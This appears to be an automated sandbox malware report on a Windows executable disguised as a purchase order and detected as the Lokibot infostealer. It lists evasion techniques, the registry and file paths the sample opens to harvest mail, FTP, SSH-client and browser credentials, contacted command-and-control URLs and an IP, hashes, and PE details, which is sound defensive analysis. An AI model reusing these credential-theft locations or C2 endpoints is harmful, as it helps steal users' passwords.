              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Purchase Order #5000012803.exe PID: 7000, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_72B21000 push eax; ret 0_2_72B2102E
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile created: C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll

              Hooking and other Techniques for Hiding and Protection:

              Icon mismatch, binary includes an icon from a different legit application in order to fool users
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: iconPdf.png
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe TID: 7004 Thread sleep time: -660000s >= -30000s
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 0_2_00405D7C FindFirstFileA, FindClose
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 0_2_004053AA CloseHandle, DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, DeleteFileA, FindNextFileA, FindClose, RemoveDirectoryA
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 0_2_00402630 FindFirstFileA
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 1_2_00403D74 FindFirstFileW, FindNextFileW, FindFirstFileW, FindNextFileW
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Thread delayed: delay time: 60000
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe API call chain: ExitProcess graph end node graph_0-3619
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe API call chain: ExitProcess graph end node graph_0-3616
              Source: nnrr3w4buo.0.dr Binary or memory string: YvMcI
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 0_2_00405DA3 GetModuleHandleA, LoadLibraryA, GetProcAddress
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 1_2_00402B7C GetProcessHeap, RtlAllocateHeap
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 0_2_0019EA56 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 0_2_0019E842 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 0_2_0019EB84 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 0_2_0019EB07 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 0_2_0019EB46 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]

              HIPS / PFW / Operating System Protection Evasion:

              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Memory written: C:\Users\user\Desktop\Purchase Order #5000012803.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Process created: C:\Users\user\Desktop\Purchase Order #5000012803.exe "C:\Users\user\Desktop\Purchase Order #5000012803.exe"
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmp Binary or memory string: Program Manager
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmp Binary or memory string: Progman
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmp Binary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 0_2_00405AA7 GetVersion, GetSystemDirectoryA, GetWindowsDirectoryA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, CoTaskMemFree, lstrcatA, lstrlenA
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 1_2_00406069 GetUserNameW

              Stealing of Sensitive Information:

              Yara detected Lokibot
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file registry)
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: PopPassword 1_2_0040D069
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: SmtpPassword 1_2_0040D069
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

              Remote Access Functionality:

              Yara detected Lokibot

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Native API 1 | Path Interception | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 2 | Account Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
              Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 112 | Obfuscated Files or Information 2 | Input Capture 1 | File and Directory Discovery 2 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 1 | Credentials in Registry 2 | System Information Discovery 5 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading 11 | NTDS | Security Software Discovery 11 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 11 | LSA Secrets | Process Discovery 1 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | System Owner/User Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              Purchase Order #5000012803.exe | 26% | ReversingLabs | Win32.Backdoor.Androm
              Purchase Order #5000012803.exe | 100% | Joe Sandbox ML |

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              Source | Detection | Scanner | Label
              0.2.Purchase Order #5000012803.exe.22d0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              1.1.Purchase Order #5000012803.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              1.0.Purchase Order #5000012803.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              1.0.Purchase Order #5000012803.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              1.0.Purchase Order #5000012803.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              1.0.Purchase Order #5000012803.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              1.0.Purchase Order #5000012803.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
              1.0.Purchase Order #5000012803.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              1.0.Purchase Order #5000012803.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
              1.2.Purchase Order #5000012803.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

              Domains

              No Antivirus matches

              URLs

              Source | Detection | Scanner | Label
              http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
              http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
              http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
              http://slimpackage.com/slimfit/five/fre.php | 100% | Avira URL Cloud | malware
              http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
              http://www.ibsensoftware.com/ | 0% | URL Reputation | safe

              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              slimpackage.com | 104.223.93.105 | true | true | | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
                http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
                http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
                http://slimpackage.com/slimfit/five/fre.php | true | Avira URL Cloud: malware | unknown
                http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://nsis.sf.net/NSIS_Error | Purchase Order #5000012803.exe | false | | high
                http://nsis.sf.net/NSIS_ErrorError | Purchase Order #5000012803.exe | false | | high
                http://www.ibsensoftware.com/ | Purchase Order #5000012803.exe, Purchase Order #5000012803.exe, 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Purchase Order #5000012803.exe, 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

                    Contacted IPs

                    Public

                    IP | Domain | Country | ASN | ASN Name | Malicious
                    104.223.93.105 | slimpackage.com | United States | 8100 | ASN-QUADRANET-GLOBALUS | true

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:553040
                    Start date:14.01.2022
                    Start time:07:14:14
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 28s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:Purchase Order #5000012803.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:17
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/6@61/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 89.7% (good quality ratio 87%)
                    • Quality average: 80.7%
                    • Quality standard deviation: 26.7%
                    HCA Information:
                    • Successful, ratio: 88%
                    • Number of executed functions: 63
                    • Number of non-executed functions: 38
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 23.211.6.115
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, settings-win.data.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: Purchase Order #5000012803.exe

                    Simulations

                    Behavior and APIs

                    Time | Type | Description
                    07:15:17 | API Interceptor | 58x Sleep call for process: Purchase Order #5000012803.exe modified

                    Joe Sandbox View / Context

                    IPs

                    Domains

                    No context

                    ASN

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\nnrr3w4buo
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):218882
                    Entropy (8bit):7.98965789846215
                    Encrypted:false
                    SSDEEP:6144:V9SOcYwR2fG8tEOnw6X/7CZJTrxSciuvI:DwEfLw6TCZpEyg
                    MD5:50A68BA520B64A2483798C97E223435F
                    SHA1:CBEAB844A1C3EAC2EB8ABE5DEF847A05FF9F7D5B
                    SHA-256:CD06A2C3858AC3B1BC6D06816DD2966154EABAB479C4B305521A84A5B409D6D7
                    SHA-512:8C604F64FE76D320D6749B9E36B3139E870534A4E0D159D5DF74A19CB5D5736A6215EFE95B7C8AFCC111521E107170C6B86F129385CD7B313C09331E7B53B84A
                    Malicious:false
                    Reputation:low
                    C:\Users\user\AppData\Local\Temp\nsgB0D.tmp
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):258678
                    Entropy (8bit):7.663931493685321
                    Encrypted:false
                    SSDEEP:6144:RS9SOcYwR2fG8tEOnw6X/7CZJTrxSciuvfN+:IwEfLw6TCZpEyXN
                    MD5:D993ADA5E7AEC7FDC7E5E62E31832EF9
                    SHA1:A7F68AC213855C6C80D38241F16076213724983F
                    SHA-256:918F6A726FBC8424E71E8B8CAF11E67B9B41D0DDC5C9C5DABA4B36889CB1D854
                    SHA-512:B955E01EFE5AD701396D5987A6545A896B8BB9FC2F34B10F03879648EDC3588AACDD74F6FD6C43B20A5BF89C0F99CFB71F79EB789E61DE77975148F86249AA14
                    Malicious:false
                    Reputation:low
                    C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):4608
                    Entropy (8bit):4.1417181736612125
                    Encrypted:false
                    SSDEEP:48:SpozIU0jblvgiPtv6UIkuW2yH+ZsQMR7/iItlRuqS:ZzWdvZNFuoH+Zdc5x
                    MD5:B70AAC2FFA041468D92918145535C5C7
                    SHA1:26F134E72D8E5C86209A54E0D05D801C1B193059
                    SHA-256:97ACCD2E535507EEAD8DA6CCDB641907134E527B19F9C64D6EF9071BFA508D66
                    SHA-512:561B10896C3539B87AA2C94CDAB5CEEC0379E56C4E949651ACDD114CEEFF18A1E3DD1A5E68E792D37B54BC47036395BF1ED883D852B5C03E3D8CB01CEFBD179A
                    Malicious:false
                    Reputation:low
                    C:\Users\user\AppData\Local\Temp\urpwvqane
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4972
                    Entropy (8bit):6.15619113991577
                    Encrypted:false
                    SSDEEP:96:Qm5+Ry+S1+aC5s+wjskAi0eXcKm5Z3p/yEaMr1L7h0MQOYRzJNUxwKjj:QmEI+S1dUs+hkAixMKA3padOYBJNUuKn
                    MD5:C7420C4BF0D9B154AF363B48CC160AD0
                    SHA1:D3C95A22A44E515830B925A2FC30B5FA6A0C628E
                    SHA-256:CAF8F4FFCA95FE9A5336A64B83554AEA6D37586A159F467D868E25F3737B4FB4
                    SHA-512:530FDA9B005576B408497D7B9E096B0CD526EA62B5D32039E4DE3CC3CEF1FCFABA2B7BB737C9662A4D0B990C7C0AAD673613BD83B56A66BCE1AC7D855E344F9C
                    Malicious:false
                    Reputation:low
                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 1
                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                    Process:C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):46
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:D898504A722BFF1524134C6AB6A5EAA5
                    SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                    SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                    SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                    Malicious:false
                    Reputation:moderate, very likely benign file

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.8958885048982035
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 92.16%
                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:Purchase Order #5000012803.exe
                    File size:247015
                    MD5:d62b8a5fdb90e9241ff0eef6ea035e32
                    SHA1:4e9e38dc4d01a649d927a933488477c5980fcb18
                    SHA256:95f5680fe4d7830a393aa84b2278051638f3c8105766c47a68c1f8981f38932b
                    SHA512:5878e0ab7e76e508499f14c077192a235a73312edaa030d0999370df6c82be56212e4258da19a8cf8f3417d0da8ba20b3e166e0b58611fc44194df2964e863fe
                    SSDEEP:6144:kw/b88QHR5lvQ2urEmJzKlf78z1++UPkq4Y1ROwy:HoRbQ2ugoz87oUPkqEwy

                    File Icon

                    Icon Hash:ecccccd4d4e8e096

                    Static PE Info

                    General

                    Entrypoint:0x403225
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:
                    Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:099c0646ea7282d232219f8807883be0

                    Entrypoint Preview

                    Instruction
                    sub esp, 00000180h
                    push ebx
                    push ebp
                    push esi
                    xor ebx, ebx
                    push edi
                    mov dword ptr [esp+18h], ebx
                    mov dword ptr [esp+10h], 00409128h
                    xor esi, esi
                    mov byte ptr [esp+14h], 00000020h
                    call dword ptr [00407030h]
                    push 00008001h
                    call dword ptr [004070B4h]
                    push ebx
                    call dword ptr [0040727Ch]
                    push 00000008h
                    mov dword ptr [00423F58h], eax
                    call 00007F2930996230h
                    mov dword ptr [00423EA4h], eax
                    push ebx
                    lea eax, dword ptr [esp+34h]
                    push 00000160h
                    push eax
                    push ebx
                    push 0041F450h
                    call dword ptr [00407158h]
                    push 004091B0h
                    push 004236A0h
                    call 00007F2930995EE7h
                    call dword ptr [004070B0h]
                    mov edi, 00429000h
                    push eax
                    push edi
                    call 00007F2930995ED5h
                    push ebx
                    call dword ptr [0040710Ch]
                    cmp byte ptr [00429000h], 00000022h
                    mov dword ptr [00423EA0h], eax
                    mov eax, edi
                    jne 00007F29309936FCh
                    mov byte ptr [esp+14h], 00000022h
                    mov eax, 00429001h
                    push dword ptr [esp+14h]
                    push eax
                    call 00007F29309959C8h
                    push eax
                    call dword ptr [0040721Ch]
                    mov dword ptr [esp+1Ch], eax
                    jmp 00007F2930993755h
                    cmp cl, 00000020h
                    jne 00007F29309936F8h
                    inc eax
                    cmp byte ptr [eax], 00000020h
                    je 00007F29309936ECh
                    cmp byte ptr [eax], 00000022h
                    mov byte ptr [eax+eax+00h], 00000000h

                    Rich Headers

                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804

                    Data Directories

                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x2528 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                    Sections

                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x5976 | 0x5a00 | False | 0.668619791667 | data | 6.46680044621 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.444878472222 | data | 5.17796812871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data | 0x9000 | 0x1af98 | 0x400 | False | 0.55078125 | data | 4.68983486809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc | 0x2c000 | 0x2528 | 0x2600 | False | 0.407072368421 | data | 5.36381099372 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    Name | RVA | Size | Type | Language | Country
                    RT_ICON | 0x2c1f0 | 0x10a8 | data | English | United States
                    RT_ICON | 0x2d298 | 0x988 | data | English | United States
                    RT_ICON | 0x2dc20 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                    RT_DIALOG | 0x2e088 | 0x100 | data | English | United States
                    RT_DIALOG | 0x2e188 | 0x11c | data | English | United States
                    RT_DIALOG | 0x2e2a8 | 0x60 | data | English | United States
                    RT_GROUP_ICON | 0x2e308 | 0x30 | data | English | United States
                    RT_MANIFEST | 0x2e338 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                    Imports

                    DLL | Import
